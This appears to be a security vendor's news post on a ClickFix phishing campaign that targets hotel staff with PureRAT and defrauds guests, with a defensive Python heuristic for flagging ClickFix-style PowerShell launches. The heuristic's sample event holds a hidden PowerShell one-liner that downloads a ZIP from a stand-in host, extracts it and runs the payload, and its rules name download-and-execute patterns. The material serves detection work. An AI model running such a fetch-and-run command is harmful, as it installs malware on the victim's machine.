A phishing operation active since April 2025 is targeting hotel administrators to steal credentials and payment data using advanced social engineering and remote access malware.
According to The Hacker News, cybersecurity researchers have uncovered a widespread phishing campaign targeting the hospitality industry, using compromised email accounts to impersonate Booking.com and lure hotel staff into visiting ClickFix-style phishing pages. These pages deploy PureRAT malware to compromise systems and harvest administrator credentials for hotel booking platforms like Booking.com and Expedia.
The campaign, active since at least April 2025 and ongoing as of October, tries to gain access to hotel management systems and use them for further fraud, including directly contacting hotel guests to steal banking information. PureRAT, the malware used in the operation, allows full remote access and data exfiltration.
The phishing emails originate from compromised accounts and direct hotel staff to fake security challenge pages. These pages use JavaScript to manipulate the browser into loading a malicious PowerShell script. Victims unknowingly execute this script, which downloads and runs a ZIP archive containing malware. The malware persists on the system and installs PureRAT (also known as zgRAT) via DLL side-loading.
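As an added illustration from the defender's side (not part of the original report), the following Python heuristic flags the process-creation shape that the ClickFix stage described above produces: an interactive parent such as explorer.exe launching powershell.exe with a hidden window, an execution-policy bypass and a download-and-extract payload. The sample events, the URL and the file names are constructed for this example.

```python
"""Heuristic for ClickFix-style PowerShell launches in process-creation
telemetry (Sysmon Event ID 1 or an EDR equivalent). The lure ends with the
victim pasting a one-liner into the Run dialog, so the telltale shape is an
interactive parent spawning powershell.exe with a hidden window, policy
bypass and a fetch-and-run payload (here a ZIP archive)."""
import re
from dataclasses import dataclass, field

INTERACTIVE_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe"}

# Each rule is (name, regex over the lowercased command line).
RULES = [
    ("hidden_window", re.compile(r"-w(indowstyle)?\s+h(idden)?\b")),
    ("policy_bypass", re.compile(r"-e(xecutionpolicy|p)\s+bypass\b")),
    ("remote_fetch", re.compile(r"invoke-webrequest|\biwr\b|downloadstring|downloadfile|\bcurl\b")),
    ("inline_exec", re.compile(r"\biex\b|invoke-expression")),
    ("zip_stage", re.compile(r"\.zip\b|expand-archive")),
]

@dataclass
class Verdict:
    suspicious: bool
    score: int
    hits: list = field(default_factory=list)

def assess_event(event: dict) -> Verdict:
    """Score one event: one point per rule hit plus one for an interactive
    parent; a total of three or more is flagged."""
    image = event.get("Image", "").rsplit("\\", 1)[-1].lower()
    if image not in {"powershell.exe", "pwsh.exe"}:
        return Verdict(False, 0)
    cmd = event.get("CommandLine", "").lower()
    hits = [name for name, rx in RULES if rx.search(cmd)]
    parent = event.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    score = len(hits) + (1 if parent in INTERACTIVE_PARENTS else 0)
    return Verdict(score >= 3, score, hits)

# Constructed sample events: the first mirrors the ClickFix chain (hidden
# PowerShell fetching a ZIP, extracting it and launching the dropped binary),
# the second is a benign scheduled-task script for comparison.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell -w hidden -ep bypass -c "iwr http://example.invalid/upd.zip '
                    r'-OutFile $env:TEMP\u.zip; Expand-Archive $env:TEMP\u.zip $env:TEMP\u; '
                    r'start $env:TEMP\u\app.exe"'},
    {"ParentImage": r"C:\Windows\System32\svchost.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -File C:\Scripts\rotate-logs.ps1"},
]

def scan(events):
    """Return the indices of events that trip the heuristic."""
    return [i for i, e in enumerate(events) if assess_event(e).suspicious]
```

Treat a hit as a triage trigger rather than a verdict: legitimate admin tooling can also use hidden windows or a policy bypass, so the parent process and the fetched artifact are what confirm the ClickFix pattern.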
PureRAT is capable of webcam access, keystroke logging, data theft, and remote command execution. It is protected with .NET Reactor, a tool used to make reverse engineering more difficult. Once installed, the malware gives attackers full control over infected hotel systems.
In addition to targeting hotel staff, attackers also reach out to hotel customers via WhatsApp or email, referencing real reservation details and asking them to verify payment information. These messages link to fake booking sites crafted to steal card data.
Analysts tracking the campaign noted that attackers are obtaining hotel administrator details from criminal marketplaces, where access is either purchased directly or traded for a share of fraudulent profits. Malware distribution is often outsourced to traffers, individuals responsible for infecting targets with infostealers or remote access tools.
Researchers also observed threat actors selling authentication logs from various travel-related systems through messaging platforms. These logs are typically verified with automated tools that test credentials against live systems using proxy infrastructure.
Additional analysis of the attack chain found that newer iterations of the phishing pages now include embedded videos, real-time user counters, OS-specific guidance, and clipboard-manipulation features, all designed to increase credibility and reduce user hesitation.
The ClickFix operation shows how easily cybercriminals can turn everyday business platforms into launch points for large-scale fraud. Instead of relying only on fake Booking.com pages or brand lookalikes, attackers are taking over genuine hotel and travel accounts and using that access to push malware, steal credentials, and reach guests directly. When a message comes from a real account inside a familiar system, even cautious users struggle to spot the deception.
For hotels, where reservations, confirmations, and payment checks happen constantly, this creates an environment where a single compromised login can expose staff and customers to financial loss and data theft. The combination of social engineering, remote access malware, and credential resale forms a closed loop that keeps feeding new victims into the campaign.
In addition to steps like enforcing MFA, reducing admin privileges, and watching for unusual account activity, hotels can strengthen their email perimeter with Paubox Inbound Email Security. Its generative AI evaluates sender behavior, message context, and subtle impersonation cues to stop phishing attempts before they reach inboxes, even if the email comes from a legitimate but compromised business account. When paired with internal platform safeguards, it helps break the phishing chains that depend on trusted systems being misused as delivery vehicles.
ClickFix is a social engineering tactic that mimics legitimate login or verification processes, often with embedded videos or security prompts to convince users to run malicious commands on their systems.
PureRAT is a remote access trojan that enables full control of an infected machine, including keylogging, webcam access, file transfer, command execution, and data exfiltration.
Attackers use stolen administrator credentials to access hotel booking systems, then send WhatsApp messages or emails that reference real reservation details to trick guests into entering payment information on fake sites.
Traffers are cybercriminals who specialize in spreading malware to target machines. They often work under an affiliate model to infect systems in exchange for a share of the profits.